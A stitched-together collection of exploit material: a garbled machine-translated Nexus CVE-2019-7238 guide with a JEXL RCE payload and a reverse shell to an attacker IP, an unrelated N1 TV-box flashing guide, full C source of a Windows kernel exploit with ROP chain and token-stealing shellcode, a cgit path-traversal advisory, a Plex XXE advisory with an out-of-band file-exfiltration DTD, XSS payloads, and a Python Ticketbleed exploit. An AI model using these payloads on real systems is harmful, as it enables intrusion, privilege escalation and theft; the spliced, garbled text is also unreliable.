ただし、OrientDB自体にはコンテンツエクセッショナルメソッドがありません。つまり、この方法はJavaで実装されています。私はそれを調べて、org.sonatype.nexus.repository.selector.internal.contentExpressionFunctionで見つけました:
CheckJexLexPression:
selectorManage.evaluateを呼び出してjexl式を実行します。
0x04コンストラクトpoc
上記の分析を通じて、ポストパッケージ分析で対応するパラメーターを構築する必要があります。以下は例です。
Windows環境の構築:
https://help.sonatype.com/repomanager3/download/download-archives-- Repository-manager-3
https://Sonatype-download.global.sl.fastly.net/nexus/3/nexus-3.14.0-04-unix.tar.gz
インストールリファレンス:
https://help.sonatype.com/learning/repository-manager-3/first-installation-and-setup/lesson-1%3a - インストールとスタート - nexus-repository-manager
Windowsへのインストールは成功しました。実行する必要があります(デフォルトパスワード:admin/admin123)
nexus.exe /run
そのPOCは次のとおりです。
POST/SERVICE/EXTDIRECT HTTP/1.1
host:155.138.147.133608081
user-agent: mozilla/5.0(windows nt 6.1; win64; x64; rv336064.0)gecko/20100101 firefox/64.0
Content-Type:アプリケーション/JSON
Content-Length: 308
Connection:閉じます
{'Action':'coreui_component'、 'method':'previewassets'、 'data ': [{' page':1、 'sta rt':0、 'limit':25、' filter ':0 [{'property':'RepositoryName'、 'Value ':'*'}、{' p Roperty':'Expression '、' value ': '' '。class.forname(' java.lang.runtime ')。getruntime()。ex ec( 'calc.exe') '}、{' property':'type '、' value ':'jexl '}]}]、' type':'rpc '、' tid'33604}
この脆弱性では、Nexusに既存のJARパッケージがある場合、局所検証中にJARレポートが最初に送信されることに注意してください。原則分析については、後で分析のために個別に取り出すことができます。
0x05環境構築
1。Ubuntu16.04にDockerとDocker-Composeをインストールします:
(1)。 PIPをインストールします
curl -s https://bootstrap.pypa.io/get-pip.py | Python3
(2)。 Dockerをインストールします
curl -s https://get.docker.com/| sh
(3)。 Dockerサービスを開始します
Service Docker Start
(4)。 Docker Composeをインストールします
PIPインストールDocker-Compose
2。使い方
(1)。脆弱性環境プロジェクトのダウンロード
git clone 3https://github.com/vulhub/vulhub.git
(2)。 Nexus利用環境に入ります
CD vulhub/nexus/cve-2019-7238
(3)。編集環境
Docker-Composeビルド
(4)。次のコマンドを実行して、Nexus Repository Manager 3.14.0を開始します
Docker-Composeビルド
しばらく待った後、環境は正常に開始できます。 http://your-ip:8081にアクセスして、Webページをご覧ください。
パスワードadmin:Admin123を使用してアカウントの背景にログインし、Mavenバージョンの下にJARパッケージをアップロードします。
この脆弱性をトリガーするには、リポジトリに少なくとも1つのパッケージが存在するようにする必要があります。
0x06脆弱性の再発
1。脆弱性エクスプロイトPOCプロジェクトをダウンロードします
git clone https://github.com/backlion/cve-2019-7238.git
2。CVE-2019-7238ディレクトリを入力します
CD CVE-2019-7238
3。CVE-2019-7238.pyを変更します。ここでは、実際の状況に応じて、remote='http://127.0.0.1:8081'およびarch="linux"の値を変更します。
VI CVE-2019-7238.py
4。攻撃者システムでCVE-2019-7238.pyスクリプトを実行してから、NCをリバウンドするBashを入力します
bash -i /dev/tcp/149.248.17.172/2333 01#IPは攻撃者システムのIPアドレスです
5。攻撃者システムでNCリスニングリバウンドを実行します
NC -LVVP 2333
0x07修理提案
現在、役人は脆弱性を変更するための新しいバージョンをリリースしています。対応する最新バージョンにアップグレードするには、上記の[セキュリティバージョン]を参照することをお勧めします。
最新バージョンのダウンロードリンク:
https://help.sonatype.com/repomanager3/download
0x08参照リンク
https://Support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-nexus-repository-manager-3-missing-Access-con-controls-and-remote-code-execution-5th-2019
https://www.lucifaer.com/2019/02/19/NEXUS%20Repository%20Manager%203%20%E8%BF%9C%E7%A8%8B%E4%A3 %E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%EF%
https://CERT.360.CN/REPORT/DETAIL?ID=3EC687EC01CCCD0854E2706590DDC215
https://blog.csdn.net/caiqiiqi/article/details/87204472
https://Blog.51Cto.com/13770310/2351479
https://github.com/vulhub/vulhub/tree/master/nexus/cve-2019-7238
Feixun N1 is particularly playable. This article will introduce in detail how to use N1 to brush isrore and use bypass routes.
It's so painful to write this article. Most of the articles online are from 18 years, with various pitfalls. I'm still doing it until 4 a.m.
Preparation
Hardware Fixun N1 (firmary is v2.23 0410 NS) USB disk (it is best if two, try to change one if you can't flash) HDMI (it's OK to connect to the monitor. If you don't have one, you can buy it. You can also make one by yourself. Find two mobile phone data cables, cut it short and connect it together according to the color.) Software balenaEtcher (mirror writing tool) isrore firmware (http://fw.koolcenter.com/iStoreOS/alpha/n1/) 
Firstware downgrade
Connect the device to the monitor and you can see the current firmware version. Anyone above 2.2 will be downgraded.
Connect the network Next, connect the mouse to N1. Click Network Connect to connect to your WiFi. The IP address will be displayed after the connection is successful.
Open ADB and click on the firmware version 4 times in a row, and the word adb will be prompted to open.
Run the downgrade toolkit Enter 2 to confirm N1 downgrade. Press any key to continue.
After it is finished, it will automatically restart.
Next, connect the USB cable to the computer.
Run the run.bat file in the downgrade toolkit again.
Enter 3
Brush into the bottom package
Flash the underlying package to allow N1 to boot from the USB drive.
After N1 enters the line brush, do not pull the line. Run USB Burning_Tool_v2.1.6.8 and you will see the word "Connect Success".
Click File - Burn Package - N1_mod_by_webpad_v2.2_20180920 (firmware)
Wait for the flash to complete. After booting up, the classic Android TV box interface is available.
Click Settings to connect to the network.
Making isrore
Run balenaEtcher. Select the downloaded firmware (be careful not to decompress the mirror package) and start making.
After completion, the content of the USB drive should be like this.
If there is any problem, use DiskGenius to delete the partition. Re-worked!
U disk boot isrore
Under normal circumstances, now insert the USB drive (the one close to HDMI, actually both are OK) 
Note that the monitor will not display after powering on.
Note that the monitor will not display after powering on.
(I was cheated for half a night and thought it was a firmware problem.)
Next, log in to the router. Check the device IP
Access IP address, default username and password root password 
Next, we need to write the data from the USB flash drive to the storage (eMMC) of N1. According to the official prompts, execute the following command.
install-to-emmc.sh 
At this point, unplug the USB flash drive and restart it.
Filling time
After the TV box firmware cannot be started normally from the USB drive, theoretically insert the USB drive and restart it. The USB drive will start automatically (because the underlying layer has been modified).
Solution: Install the APP (Fixun Remote Control) on the mobile phone and connect according to the TV IP address.
After selecting the line brush, it will start from the USB drive.
After restarting the online flash, enter Recovery and follow the above description. Theoretically, the USB flash drive will start after restarting the online flash. Enter the system (the monitor does not display the logo flashes). But the prompt is as follows:
The reason is that there is a problem with the firmware in the USB flash drive. For example, after decompressing the file when flashing the firmware, select Mirror flashing.
mount disk
Just mount the disk according to the Linux environment. It should be noted that mount 3.5-inch disks. Need to buy the one with additional power supply. Otherwise it cannot be recognized.
Tool Kit
WeChat public account [kali notes] backend reply n1 to get.
#include "stdafx.h"
#include <stdio.h>
#include <Windows.h>
#include <Psapi.h>
#include <Shlobj.h>
#pragma comment (lib,"psapi")
PULONGLONG leak_buffer = (PULONGLONG)VirtualAlloc((LPVOID)0x000000001a000000, 0x2000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
ULONGLONG leakQWORD(ULONGLONG addr, HANDLE driver)
{
memset((LPVOID)0x000000001a000000, 0x11, 0x1000);
memset((LPVOID)0x000000001a001000, 0x22, 0x1000);
leak_buffer[0] = 0x000000001a000008;
leak_buffer[1] = 0x0000000000000003;
leak_buffer[4] = 0x000000001a000028;
leak_buffer[6] = addr - 0x70;
DWORD IoControlCode = 0x22608C;
LPVOID InputBuffer = (LPVOID)0x000000001a000000;
DWORD InputBufferLength = 0x20;
LPVOID OutputBuffer = (LPVOID)0x000000001a001000;
DWORD OutputBufferLength = 0x110;
DWORD lpBytesReturned;
BOOL triggerIOCTL;
triggerIOCTL = DeviceIoControl(driver, IoControlCode, InputBuffer, InputBufferLength, OutputBuffer, OutputBufferLength, &lpBytesReturned, NULL);
if (!triggerIOCTL)
{
printf("[!] Error in the SYSCALL: %d\n", GetLastError());
}
ULONGLONG result = leak_buffer[0x202];
return result;
}
ULONGLONG leakNtBase(HANDLE driver)
{
ULONGLONG teb = (ULONGLONG)NtCurrentTeb();
ULONGLONG thread = *(PULONGLONG)(teb + 0x78);
ULONGLONG threadInfo = leakQWORD(thread, driver);
ULONGLONG ntAddr = leakQWORD(threadInfo + 0x2a8, driver);
ULONGLONG baseAddr = 0;
ULONGLONG signature = 0x00905a4d;
ULONGLONG searchAddr = ntAddr & 0xFFFFFFFFFFFFF000;
while (TRUE)
{
ULONGLONG readData = leakQWORD(searchAddr, driver);
ULONGLONG tmp = readData & 0xFFFFFFFF;
/*
printf("%llx\n", readData);
printf("%llx\n", tmp);
*/
if (tmp == signature)
{
baseAddr = searchAddr;
break;
}
searchAddr = searchAddr - 0x1000;
}
return baseAddr;
}
ULONGLONG leakFortiBase(HANDLE driver, ULONGLONG ntBase)
{
ULONGLONG PsLoadModuleListAddr = ntBase + 0x34c5a0;
ULONGLONG searchAddr = leakQWORD(PsLoadModuleListAddr, driver);
ULONGLONG addr = 0;
while (1)
{
ULONGLONG namePointer = leakQWORD(searchAddr + 0x60, driver);
ULONGLONG name = leakQWORD(namePointer, driver);
if (name == 0x00740072006f0046)
{
name = leakQWORD(namePointer + 8, driver);
if (name == 0x0069006800530069)
{
addr = leakQWORD(searchAddr + 0x30, driver);
break;
}
}
searchAddr = leakQWORD(searchAddr, driver);
}
return addr;
}
ULONGLONG allocate_fake_stack(ULONGLONG ntBase, ULONGLONG fortishield_callback, ULONGLONG fortishield_restore, ULONGLONG pte_result)
{
PULONGLONG fake_stack = (PULONGLONG)VirtualAlloc((LPVOID)0x00000000f5ffe000, 0x12000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (fake_stack == NULL)
{
printf("[!] Error while allocating the fake stack: %d\n", GetLastError());
return 1;
}
memset(fake_stack, 0x41, 0x12000);
PULONGLONG ropStack = (PULONGLONG)fake_stack + 0x2000;
DWORD index = 0;
// <NULL Callback>
ropStack[index] = ntBase + 0x1684ef; index++; // pop rax ; pop rcx ; ret
ropStack[index] = fortishield_callback; index++; // FortiShield Callback
ropStack[index] = 0x0000000000000000; index++; // NULL
ropStack[index] = ntBase + 0x937eb; index++; // mov qword [rax], rcx ; ret
// </NULL Callback>
// <Flip U=S bit>
ropStack[index] = ntBase + 0x88614; index++; // pop rax ; ret
ropStack[index] = pte_result; index++; // PTE VA
ropStack[index] = ntBase + 0x1a3cb2; index++; // pop rdx ; ret
ropStack[index] = 0x0000000000000063; index++; // DIRTY + ACCESSED + R/W + PRESENT
ropStack[index] = ntBase + 0xe8a8b; index++; // mov byte [rax], dl ; add eax, 0x01740000 ; ret
ropStack[index] = ntBase + 0x11e000; index++; // wbinvd ; ret
// </Flip U=S bit>
// <Restore variables & shellcode>
ropStack[index] = 0x00000000f6000100; index++; // Shellcode address
ropStack[index] = fortishield_restore; index++; // FortiShield return location
// </Restore variables & shellcode>
char token_steal[] =
"\x48\x31\xc0\x65\x48\x8b\x80"
"\x88\x01\x00\x00\x48\x8b\x80"
"\xb8\x00\x00\x00\x49\x89\xc0"
"\x48\x8b\x80\xe8\x02\x00\x00"
"\x48\x2d\xe8\x02\x00\x00\x48"
"\x8b\x88\xe0\x02\x00\x00\x48"
"\x83\xf9\x04\x75\xe6\x4c\x8b"
"\x88\x58\x03\x00\x00\x4d\x89"
"\x88\x58\x03\x00\x00\x3E\x48"
"\x8B\x04\x24\x48\x89\xF4\x48"
"\x83\xEC\x20\xFF\xE0";
memcpy((fake_stack + 0x2020), token_steal, sizeof(token_steal));
return 0;
}
ULONGLONG get_pxe_address_64(ULONGLONG address, ULONGLONG pte_start)
{
ULONGLONG result = address >> 9;
result = result | pte_start;
result = result & (pte_start + 0x0000007ffffffff8);
return result;
}
int trigger_callback()
{
printf("[+] Creating dummy file\n");
system("echo test > C:\\Users\\n00b\\AppData\\LocalLow\\test.txt");
printf("[+] Calling MoveFileEx()\n");
BOOL MFEresult = MoveFileEx(L"C:\\Users\\n00b\\AppData\\LocalLow\\test.txt", L"C:\\Users\\n00b\\AppData\\LocalLow\\test2.txt", MOVEFILE_REPLACE_EXISTING);
if (MFEresult == 0)
{
printf("[!] Error while calling MoveFileEx(): %d\n", GetLastError());
return 1;
}
return 0;
}
int main()
{
LoadLibraryA("user32.dll"); // Populate Win32ThreadInfo
HANDLE mdare = CreateFile(L"\\\\.\\mdareDriver_48", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
if (mdare == INVALID_HANDLE_VALUE)
{
printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
return 1;
}
HANDLE forti = CreateFile(L"\\\\.\\FortiShield", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
if (forti == INVALID_HANDLE_VALUE)
{
printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
return 1;
}
LPDWORD hThread_id = 0;
HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&trigger_callback, NULL, CREATE_SUSPENDED, hThread_id);
if (hThread == NULL)
{
printf("[!] Error while calling CreateThread: %d\n", GetLastError());
return 1;
}
BOOL hThread_priority = SetThreadPriority(hThread, THREAD_PRIORITY_HIGHEST);
if (hThread_priority == 0)
{
printf("[!] Error while calling SetThreadPriority: %d\n", GetLastError());
return 1;
}
ULONGLONG ntBase = leakNtBase(mdare);
ULONGLONG ntPivot = ntBase + 0x1ab3ec; // mov esp, 0xf6000000; retn;
ULONGLONG ntMiGetPteAddressOffset = leakQWORD(ntBase + 0x62aeb, mdare);
ULONGLONG fortishieldBase = leakFortiBase(mdare, ntBase);
ULONGLONG fortishield_callback = fortishieldBase + 0xd150;
ULONGLONG fortishield_restore = fortishieldBase + 0x2f73;
printf("[+] ntoskrnl.exe base address is: 0x%llx\n", ntBase);
printf("[+] PTE VA start address is: 0x%llx\n", ntMiGetPteAddressOffset);
printf("[+] FortiShield.sys base address is: 0x%llx\n", fortishieldBase);
ULONGLONG pte_result = get_pxe_address_64(0xf6000000, ntMiGetPteAddressOffset);
printf("[+] PTE virtual address for 0xf6000000: %I64x\n", pte_result);
allocate_fake_stack(ntBase, fortishield_callback, fortishield_restore, pte_result);
DWORD IoControlCode = 0x220028;
ULONGLONG InputBuffer = ntPivot;
DWORD InputBufferLength = 0x8;
ULONGLONG OutputBuffer = 0x0;
DWORD OutputBufferLength = 0x0;
DWORD lpBytesReturned;
//DebugBreak();
BOOL triggerIOCTL = DeviceIoControl(forti, IoControlCode, (LPVOID)&InputBuffer, InputBufferLength, (LPVOID)&OutputBuffer, OutputBufferLength, &lpBytesReturned, NULL);
ResumeThread(hThread);
WaitForSingleObject(hThread, INFINITE);
system("start cmd.exe");
return 0;
}
There is a directory traversal vulnerability in cgit_clone_objects(), reachable when the configuration flag enable-http-clone is set to 1 (default):
void cgit_clone_objects(void)
{
if (!ctx.qry.path) {
cgit_print_error_page(400, "Bad request", "Bad request");
return;
}
if (!strcmp(ctx.qry.path, "info/packs")) {
print_pack_info();
return;
}
send_file(git_path("objects/%s", ctx.qry.path));
}
send_file() is a function that simply sends the data stored at the given filesystem path out over the network.
git_path() partially rewrites the provided path and e.g. prepends the base path of the repository, but it does not sanitize the provided path to prevent directory traversal.
ctx.qry.path can come from querystring_cb(), which takes unescaped data from the querystring. To trigger this case:
$ curl http://127.0.0.1/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
Issue: Out-of-Band XXE in Plex Media Server's SSDP Processing
Reserved CVE: CVE-2018-13415
# Vulnerability Overview
The XML parsing engine for Plex Media Server's SSDP/UPNP functionality is vulnerable to an XML External Entity Processing (XXE) attack. Unauthenticated attackers on the same LAN can use this vulnerability to:
- Access arbitrary files from the filesystem with the same permission as the user account running Plex.
- Initiate SMB connections to capture NetNTLM challenge/response and crack to clear-text password.
- Initiate SMB connections to relay NetNTLM challenge/response and achieve Remote Command Execution in Windows domains.
Exploitation can be demonstrated using evil-ssdp (https://gitlab.com/initstring/evil-ssdp).
# Discovered By
Chris Moberly @ The Missing Link Security
# Vendor Status
Disclosed to Plex security team, pending resolution.
# Vulnerability Details
Attack type: Remote, unauthenticated
Impact: Information disclosure up to code execution
Affected component: Plex Media Server's SSDP discovery / parsing with libxml2
Operating Systems affected: Verified Windows 10 and Ubuntu Linux 18.10 (likely all versions)
Plex version affected: Tested on 1.13.2.5154 (current as of July 2018). Older versions likely also vulnerable.
Attack vector: XXE
# Technical Overview
Plex, like many other media servers, will attempt to discover other devices on a local network. The discovery process is handled by Simple Service Discovery Protocol (SSDP), which sends a UDP multicast out to 239.255.255.250 on port 1900. This is the first step in finding and adding Universal Plug and Play (UPNP) devices.
We can reply to that UDP multicast directly on the same port that the request initiated from, informing this client that we have a shared device. When we do this, we provide the location of an XML file containing more information about our device. This is called a Device Descriptor.
Plex will automatically access the Device Descriptor over HTTP, parsing the XML content. This is expected behaviour for SSDP/UPNP.
By hosting a specially crafted XML file at that location, we can force Plex Media Server to do several things. The POC used to prove this vulnerability (POC 1 below) contained the following XML content:
```
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file://///$smbServer/smb/hash.jpg" >
<!ENTITY xxe-url SYSTEM "http://$localIp:$localPort/ssdp/xxe.html" >
]>
<hello>&xxe;&xxe-url;</hello>
<root>
<specVersion>
<major>1</major>
<minor>0</minor>
</specVersion>
<device>
```
When Plex parses this, it does two things:
1. Accesses the SMB share running at the $smbServer variable. This allows us to collect or relay the NetNTLM challenge/response.
2. Accesses an HTTP server at the $localIp variable. This is used for verification purposes while testing the vulnerability.
The unexpected behaviour here is the ability to provide the `ENTITY` tags, forcing Plex to automatically access file paths and HTTP URLs. While our POC above uses an SMB share for attacking Windows clients, this could be modified to read local files into a variable and then pass that variable via HTTP to an attacker-controlled server. This type of attack could be used to read the contents of local files (like /etc/passwd in the Linux world).
# POC 1: Capcturing NetNTLM Challenge/Response
This is a common attack method inside a Windows domain, where compromising an account can assist with moving laterally through the network.
This vulnerability can be easily validated using the [evil-ssdp tool found here](https://gitlab.com/initstring/evil-ssdp).
The process is:
1. Execute the evil-ssdp tool as follows from a Linux host:
```
essdp.py eth0 -t xxe-smb # instructs tool to use the 'xxe' template for zero-day hunting
```
2. From the same Linux host, either launch a simple netcat listener like this:
```
sudo nc -nlvp 445
```
or use Impacket to listen and extract the NetNTLM challenge/response as follows:
```
sudo python examples/smbserver.py smb /tmp/smb/
```
3. From a Windows host on the same network, simply restart Plex. evil-ssdp will display messages like the following:
```
[M-SEARCH] New Host 192.168.1.100, Service Type: ssdp:all
[XML REQUEST] Host: 192.168.1.100, User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
GET /ssdp/device-desc.xml
[XML REQUEST] Host: 192.168.1.100, User-Agent: DVBLink
GET /ssdp/device-desc.xml
[XXE VULN!!!!] Host: 192.168.1.100, User-Agent: None
```
When that happens, either the netcat listener or the Impacket SMB server will receive the connection. If using Impacket, you will now have the NetNTLM challenge/response of the user running Plex. This can be cracked to clear-text using tools like Hashcat. Alternatively, you can use Impacket to relay that hash to another machine on the network, achieving remote code execution.
# POC 2: Accessing Arbitrary Files
If an attacker knows specifically what files they are looking for, this same vulnerability can be used to extract that information. Essentially, an XML entity will be defined as a variable, storing the output of a file on the machine where Plex is installed. Then, an HTTP request will be sent to the attacker's machine that includes that variable. The attacker will be able to see this file in their HTTP server logs.
We need two files hosted on the attacking server to do this. The initial Device Descriptor sent is:
```
<!DOCTYPE data[
<!ENTITY % file SYSTEM "file:///C:/users/public/pwned.txt">
<!ENTITY % dtd SYSTEM "http://$localIp:$localPort/ssdp/data.dtd">
%dtd;
]>
<data>&send;</data>
```
Which triggers another connection request to the following data.dtd file:
```
<!ENTITY % all "<!ENTITY send SYSTEM 'http://$localIp:$localPort/?exfiltrated=%file;'>">
%all;
```
We can also verify this using the evil-ssdp tool, using the 'xxe-exfil' template. For this POC, only extraction of 1-line files was found to be possible.
To reproduce:
1. Create a test file 'C:\Users\Public\pwned.txt' on the Windows hosts where Plex is installed. Please 1 line of text with no whitespaces inside, like this:
```
secretstuff!
```
2. Execute the evil-ssdp tool as follows from a Linux host on the same network:
```
essdp.py eth0 -t xxe-exfil # instructs tool to use the 'xxe-exfil' template for zero-day hunting
```
3. Back on the Windows host, simply restart Plex. evil-ssdp will display messages like the following
```
[XML REQUEST] Host: 192.168.1.100, User-Agent: DVBLink
GET /ssdp/device-desc.xml
[XXE VULN!!!!] Host: 192.168.1.100, User-Agent: None
GET /ssdp/data.dtd
[EXFILTRATION] Host: 192.168.1.100, User-Agent: None
GET /?exfiltrated=secretstuff!
```
*******************************************************************************************
# Exploit Title: PHP Template Store Script- 3.0.6 - Stored XSS via Addres ,Bank Name,and A/c Holder Name
# Date: 02.08.2018
# Site Titel : Exclusive Scripts
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/
# Category: Web Application
# Version: 3.0.6
# Exploit Author: Sarafraz Khan
# Contact: https://www.facebook.com/sarfraj.khan.79
# Web: https://goglequeens.com
# Tested on: Windows 10 -Firefox
# CVE-2018-14869
*****************************************************************************************
Proof of Concept:-
--------------------------
1. Go to the site ( http://www.server.com/ ) .
2- Click on => Login => Register => and then fill the Form and click on Register Now
3-Goto your mail and Verify it.
4-Now come back to site and Sign in using your Verified mail and Password.
5-Goto Setting => Personal information and paste these code in
Address line 1 => "><img src=x onerror=prompt(/SARAFRAZ/)>
Address Line 2 => "><img src=x onerror=prompt(/KHAN/)>
Bank name => "><img src=x onerror=prompt(/KING/)>
A/C Holder name => "><img src=x onerror=prompt(/GOOGLEQUEENS/)>
and then click on Update Profile.
6-Now You will having popup of /SARAFRAZ/ , /KHAN/ , / KING/ and /GOOGLEQUEENS/ in you account..
***************************************************************************************
# -*- coding: utf-8 -*-
#!/usr/bin/python
# Exploit Title: Ticketbleed
# Google Dork: n/a
# Date: Exploit: 02/13/17, Advisory Published: 02/09/17
# Exploit Author: @0x00string
# Vendor Homepage: https://f5.com/
# Software Link: https://support.f5.com/csp/article/K05121675
# Version: see software link for versions
# Tested on: F5 BIGIP 11.6
# CVE : CVE-2016-9244
# require: scapy_ssl_tls (https://github.com/tintinweb/scapy-ssl_tls)
import re, getopt, sys, socket
from struct import *
try:
from scapy_ssl_tls.ssl_tls import *
except ImportError:
from scapy.layers.ssl_tls import *
def banner():
print '''
lol ty filippo!
ty tintinweb!
0000000000000
0000000000000000000 00
00000000000000000000000000000
0000000000000000000000000000000
000000000 0000000000
00000000 0000000000
0000000 000000000000
0000000 000000000000000
000000 000000000 000000
0000000 000000000 000000
000000 000000000 000000
000000 000000000 000000
000000 00000000 000000
000000 000000000 000000
0000000 000000000 0000000
000000 000000000 000000
0000000000000000 0000000
0000000000000 0000000
00000000000 00000000
00000000000 000000000
0000000000000000000000000000000
00000000000000000000000000000
000 0000000000000000000
0000000000000
@0x00string
https://github.com/0x00string/oldays/blob/master/CVE-2016-9244.py
'''
def usage ():
print ("python script.py <args>\n"
" -h, --help: Show this message\n"
" -a, --rhost: Target IP address\n"
" -b, --rport: Target port\n"
"\n\n"
"Examples:\n"
"python script.py -a 10.10.10.10 -b 443\n"
"python script.py --rhost 10.10.10.10 --rport 8443")
exit()
def pretty (t, m):
if (t is "+"):
print "\x1b[32;1m[+]\x1b[0m\t" + m + "\n",
elif (t is "-"):
print "\x1b[31;1m[-]\x1b[0m\t" + m + "\n",
elif (t is "*"):
print "\x1b[34;1m[*]\x1b[0m\t" + m + "\n",
elif (t is "!"):
print "\x1b[33;1m[!]\x1b[0m\t" + m + "\n",
def createDump (input):
d, b, h = '', [], []
u = list(input)
for e in u:
h.append(e.encode("hex"))
if e == '0x0':
b.append('0')
elif 30 > ord(e) or ord(e) > 128:
b.append('.')
elif 30 < ord(e) or ord(e) < 128:
b.append(e)
i = 0
while i < len(h):
if (len(h) - i ) >= 16:
d += ' '.join(h[i:i+16])
d += " "
d += ' '.join(b[i:i+16])
d += "\n"
i = i + 16
else:
d += ' '.join(h[i:(len(h) - 0 )])
pad = len(' '.join(h[i:(len(h) - 0 )]))
d += ' ' * (56 - pad)
d += ' '.join(b[i:(len(h) - 0 )])
d += "\n"
i = i + len(h)
return d
def ticketBleed (rhost, rport):
h = (rhost,int(rport));
version = TLSVersion.TLS_1_2
secret = ""
session_ticket = ""
sid = ""
cipher = TLSCipherSuite.ECDHE_RSA_WITH_AES_256_CBC_SHA
with TLSSocket(socket.socket(), client=True) as sock:
sock.connect(h)
ctx = sock.tls_ctx
packet = TLSRecord() / TLSHandshake() / TLSClientHello(version=version, cipher_suites=TLS_CIPHER_SUITES.keys(), extensions=[TLSExtension() / TLSExtSessionTicketTLS(data="")])
sock.sendall(packet)
sock.recvall()
packet_ke = TLSRecord(version=version) / TLSHandshake() / ctx.get_client_kex_data()
packet_ccs = TLSRecord(version=TLSVersion.TLS_1_2) / TLSChangeCipherSpec()
sock.sendall(TLS.from_records([packet_ke, packet_ccs]))
sock.sendall(to_raw(TLSFinished(), ctx))
ret = sock.recvall()
session_ticket = ret[TLSSessionTicket].ticket
secret = ctx.master_secret
#pretty("*", "ctx 1: \n" + str(ctx))
with TLSSocket(socket.socket(), client=True) as sock:
sock.connect(h)
ctx = sock.tls_ctx
packet = TLSRecord() / TLSHandshake() / TLSClientHello(version=TLSVersion.TLS_1_2, cipher_suites=TLS_CIPHER_SUITES.keys(), session_id="A", extensions=[TLSExtension() / TLSExtSessionTicketTLS(data=session_ticket)])
sock.tls_ctx.resume_session(secret)
sock.sendall(packet)
ret = sock.recvall()
sid = ret[TLSServerHello].session_id
#pretty("*", "ctx 2: \n" + str(ctx))
pretty("+", "bled 'A' + 31 bytes: \n" + createDump(sid))
def main():
rhost = None;
rport = None;
options, remainder = getopt.getopt(sys.argv[1:], 'a:b:h:', ['rhost=','rport=','help',])
for opt, arg in options:
if opt in ('-h', '--help'):
usage()
elif opt in ('-a','--rhost'):
rhost = arg;
elif opt in ('-b','--rport'):
rport = arg;
banner()
if rhost is None or rport is None:
usage()
ticketBleed(rhost,rport)
exit(0);
if __name__ == "__main__":
main()